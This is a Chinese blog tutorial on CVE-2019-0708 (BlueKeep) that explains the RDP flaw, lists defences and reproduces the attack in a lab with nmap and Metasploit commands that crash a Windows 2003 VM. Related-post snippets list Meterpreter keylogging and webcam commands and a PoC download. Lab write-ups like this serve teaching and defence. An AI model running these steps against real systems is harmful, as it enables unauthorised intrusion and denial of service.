CVE-2019-0708 漏洞复现

最新推荐文章于 2025-04-26 15:51:12 发布
最新推荐文章于 2025-04-26 15:51:12 发布
阅读量1.5k 收藏 15
点赞数 19
分类专栏: 网安基础漏洞 文章标签: 网络 安全 web安全 系统安全 计算机网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinyaoyaotu/article/details/145216234
版权

前言

在当今数字化时代,网络安全如同坚固的城墙,守护着我们的信息资产。然而,不断涌现的安全漏洞却如同一颗颗隐藏的 “定时炸弹”,随时可能对我们的系统造成严重威胁。今天,我们将深入探讨曾经引起轩然大波的 CVE-2019-0708 漏洞,详细了解其原理、影响范围、利用方式以及至关重要的防御措施。

漏洞介绍

一、漏洞原理

CVE-2019-0708 漏洞,也被称为 “BlueKeep(蓝魔虫)” 漏洞,主要存在于微软 Windows 系统的远程桌面服务(RDP)中。远程桌面服务是 Windows 系统中一项非常实用的功能,它允许用户通过网络连接到远程计算机,就像在本地操作一样。然而,这个漏洞的出现,使得这一便利功能成为了攻击者入侵系统的 “突破口”。

攻击者利用 RDP 协议中的漏洞,通过向目标系统的 3389 端口发送精心构造的恶意请求。这些请求中包含了特制的代码,目标系统在处理这些请求时,由于远程桌面服务在处理某些类型的图形相关请求时存在缺陷,无法正确验证和处理这些恶意数据,从而导致执行攻击者预先植入的恶意代码。这就如同在一扇坚固的大门上找到了一个未被察觉的 “暗锁”,攻击者无需钥匙(身份验证),就能轻松进入系统内部。

二、影响范围

该漏洞影响范围极其广泛,涵盖了多个主流的 Windows 系统版本。其中包括 Windows 7、Windows Server 2003、Windows Server 2008、Windows Vista 以及 Windows XP 等。无论是个人用户使用的家用电脑,还是企业办公环境中的服务器和工作站,只要运行上述受影响的系统版本,并且开启了远程桌面服务,都面临着被攻击的风险。

三、利用方式

攻击者利用 CVE-2019-0708 漏洞的方式相对直接且高效。他们通常会使用自动化工具,扫描互联网上开放 3389 端口的 Windows 系统。一旦发现目标,就会向这些系统发送特制的 RDP 请求。如果目标系统存在该漏洞,恶意代码将在系统中被执行。

攻击者利用成功后,能够在目标系统上实现一系列恶意操作。例如,他们可以安装各种恶意软件,如勒索软件,对用户数据进行加密,并索要赎金;也可以窃取用户的敏感信息,如账号密码、财务数据等;还可以进一步控制目标系统,将其作为 “跳板”,攻击其他网络内的设备,扩大攻击范围。这种利用方式就像一场悄无声息的 “网络入侵风暴”,让用户在毫无察觉的情况下,系统就已陷入攻击者的掌控。

四、防御措施

面对如此严峻的漏洞威胁,采取有效的防御措施刻不容缓。

及时安装补丁:这是最直接、最有效的防御手段。微软在发现该漏洞后,迅速发布了针对受影响系统版本的安全补丁。用户应尽快访问微软官方网站,根据自己的系统版本下载并安装相应的补丁,及时修复系统中的漏洞。对于 Windows XP、Windows Server 2003 等已停止官方支持的系统,微软也专门为此次漏洞提供了安全更新,用户务必及时安装。

关闭不必要的服务:如果用户在日常使用中不需要远程桌面服务,建议将其关闭。关闭该服务可以从源头上避免攻击者利用此漏洞进行攻击。在 Windows 系统中,可以通过 “控制面板” - “管理工具” - “服务”,找到 “Remote Desktop Services” 服务,将其停止并设置为禁用状态。

加强网络访问控制:在企业网络环境中,通过防火墙设置严格的访问策略。限制外部网络对内部系统 3389 端口的访问,只允许特定的、可信任的 IP 地址进行连接。同时,对内部网络中的设备之间的访问也进行合理的限制,防止攻击者在内部网络中横向移动。对于个人用户,也可以通过路由器设置,限制外部设备对家庭网络中电脑的 3389 端口访问。

定期进行安全扫描:使用专业的安全扫描工具,定期对系统进行全面扫描。这些工具可以检测系统中是否存在已知的安全漏洞,包括 CVE-2019-0708 漏洞。及时发现并修复潜在的安全隐患,确保系统的安全性。

漏洞复现实战

一、环境准备

首先准备两台虚拟机
攻击机kali:10.0.0.104
目标靶机win2003:10.0.0.100

二、攻击实操

首先我们使用nmap工具对目标靶机进行扫描,查看是否存在漏洞

nmap --script=vuln 10.0.0.100 -v -sV

查看扫描结果存在此漏洞此时进行漏洞复现

kali攻击机进入msf模块
以下是漏洞复现所使用到了命令

msfconsole               #进入msf控制台
search CVE-2019-0708     #搜索漏洞编号
use 3                    #使用第3个攻击模块
info 或者 show options   #查看需要设置的参数
set target 1             #设置适应的版本号             
set RHOSTS 10.0.0.100    #设置目标靶机ip地址
show options             #查看是否设置正确
run                      #设置好代码后运行

使用3攻击模块,use3

查看设置的参数info或者时候show options

设置适用版本set target 1并指定ip地址
并运行此代码,显示运行成功,此时查看目标靶机

已经蓝屏崩溃

至此,CVE-2019-0708漏洞复现结束

总之,面对 CVE-2019-0708 这类漏洞,落实防御措施,方能保障系统安全。感谢大家的观看!

CVE-2019-0708漏洞复现
HoYim
03-05 1191
CVE-2019-0708漏洞复现 CVE-2019-0708背景 Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。 CVE-2019-0708这个漏洞最早爆出是在今年5月份,不过当时这个漏洞POC只能使得目标主机蓝屏,在前一段...
Kali--MSF(CVE-2019-0708漏洞复现
weixin_53946822的博客
08-25 664
出现你就已经成功的入侵的对方的电脑监控靶机电脑屏幕keyscan_start 开始捕获击键(开始键盘记录)keyscan_dump 转储按键缓冲(下载键盘记录)keyscan_stop 停止捕获击键(停止键盘记录)record_mic X秒从默认的麦克风record_mic音频记录(音频录制)webcam_chat 开始视频聊天(视频,对方会有弹窗)webcam_list 单摄像头(查看摄像头列表)webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
CVE-2019-0708漏洞复现(远程桌面服务)
最新发布
m0_74795359的博客
04-26 405
CVE-2019-0708是Windows远程桌面服务(RDP)的远程代码执行漏洞,影响未打补丁的Windows系统。攻击者无需用户交互即可发送恶意RDP请求,触发堆溢出,最终执行任意代码。该漏洞被命名为"BlueKeep",因其潜在危害被评级为(CVSS 9.8)。
[漏洞复现]CVE-2019-0708
网络安全知识分享
03-05 4877
CVE-2019-0708复现一、远程桌面连接二、kali系统还原漏洞 一、远程桌面连接 首先,我们要设置远程连接 在控制面板中,搜索“远程设置”->“远程”,勾选“允许远程协助连接这台计算机”和“仅允许运行使用网络级别身份验证的远程桌面的计算机联机”,然后点击“应用”。 下一步,查看Win7的IP地址,CMD中输入指令ipconfig 接着打开远程控制的电脑Win10系统,在运行中输入“mstsc”。 输入刚才得知的Win7 IP地址 是 下一步的弹窗会要求输入账户和密码,点击确定(或者保存密码
CVE-2019-0708(远程桌面服务RCE)漏洞复现(超详细Getshell)
unlash的博客
10-28 1万+
CVE-2019-0708(远程桌面服务RCE)漏洞复现(超详细Getshell) 漏洞介绍 漏洞修复 复现条件
CVE 2019-0708 漏洞复现
n5xxxx__zy的博客
07-11 535
0x00 环境要求 被攻击机环境:win7 64位 需要开启3389 (远程桌面设置允许),关闭防火墙 攻击机环境:python3 0x01 下载POC Gayhub 找到CVE2019-0708 找到poc git clone https://github.com/n1xbyte/CVE-2019-0708.git//对其poc进行git clone 0x02开...
cve-2019-0708漏洞复现
yeshankuangrenaaaaa的博客
07-23 6276
CVE-2019-0708漏洞复现记录 测试:Iron Date:2020-06-24 远程执行代码漏洞的攻击 文章目录CVE-2019-0708漏洞复现记录漏洞描述漏洞复现复现环境说明检验靶机环境是否满足攻击条件kali-操作判断靶机的漏洞是否可利用进行攻击重试漏洞应对方案打补丁缓解变通方法参考链接变通方法参考链接 漏洞描述 远程桌面服务远程执行代码漏洞 当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求时,远程桌面服务中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利
windows CVE 2019-0708 复现
时光凉春衫薄的博客
08-08 789
今天尝试一下CVE 2019-0708这个漏洞 这个漏洞出来有一段时间了 打击面挺广的,一直在忙也没空做这个实验今天闲下来做做这个实验。 实验环境: windows 7 已开启远程桌面功能 kali2019一台 实验步骤: 1.win7 开启之后就放在那里就好不用管他 2.在kali上下载测试的payloag工具 下载地址https://github.com/n1xbyte...
漏洞复现CVE-2019-0708(BlueKeep)
weixin_45632448的博客
06-14 4038
2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCry 勒索病毒的传播方式类似。存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数
CVE-2019-0708(远程桌面)漏洞复现
weixin_43806577的博客
08-26 5735
一、CVE-2019-0708漏洞简介 CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 二、测试环境 Kali虚拟机、Windows Server 2008 R2 64位(Windows服务器需开启远程桌面服务)、windows 7 64位(开启远程桌面服务) 三、测试过程 (1)查看IP Kali的IP地址为1...
CVE-2019-0708复现
Melrose666的博客
01-11 806
太懒了所以就懒得整理了,直接发自己写的大作业报告了,主要就是不需要导入文件的问题,最新版的msf直接用自带的模块就可以了。 图片不知道为什么导入不了,有需要私。 背景介绍 1.漏洞介绍 CVE-2019-0708(Bluekeep)漏洞又称非蓝屏POC是Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞2019年危害严重性最大的漏洞。所以我打算使用MSF工具实现对此漏洞复现和分析。工具..
CVE-2019-0708(BlueKeep)漏洞分析与复现
热门推荐
未完成的歌~的博客
03-14 1万+
文章目录一、 漏洞简介1、漏洞介绍:2、漏洞原理:3、影响版本:二、 漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的漏洞模块:3、对靶机进行漏洞扫描:4、使用攻击模块,对靶机进行攻击5、使用POC,进行蓝屏攻击 一、 漏洞简介 1、漏洞介绍: 2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCr
CVE
03-17
### CVE(常见漏洞和暴露)概述 Common Vulnerabilities and Exposures (CVE) 是一种国际标准,用于唯一标识已知的安全漏洞或暴露问题。通过 CVE 列表,研究人员、开发者以及安全团队可以快速定位并处理特定的威胁。当提到 CVE 细节时,通常会涉及其编号、描述、影响范围以及可能的风险评分体系如 CVSS(Common Vulnerability Scoring System)。如果需要查找具体的 CVE 编号及其详情,可以通过官方数据库或其他可信资源访问这些信息[^1]。 例如,在实际操作过程中,渗透测试人员可能会利用在线工具或者脚本自动化扫描目标系统的潜在弱点,并将其映射到对应的 CVE 条目上以便进一步分析。这种做法有助于优先级排序以及制定修复计划[^3]。 以下是 Python 脚本的一个简单实现方式来查询某个指定的 CVE 号码: ```python import requests def fetch_cve_details(cve_id): url = f"https://services.nvd.nist.gov/rest/json/cve/1.0/{cve_id}" response = requests.get(url) if response.status_code == 200: data = response.json() cve_description = data['result']['CVE_Items'][0]['cve']['description']['description_data'][0]['value'] return cve_description else: return "Failed to retrieve details." print(fetch_cve_details("CVE-2023-XXXX")) ``` 此代码片段展示了如何调用 NVD API 获取有关给定 CVE 的具体说明部分。注意替换 `"CVE-2023-XXXX"` 成真实存在的 ID 才能获得有效结果。 另外需要注意的是,在配置某些加密通信协议比如 Java Secure Socket Extension (JSSE),也可能遇到与证书验证失败相关的异常情况,这同样可能是由于未解决的 CVE 导致的问题之一[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值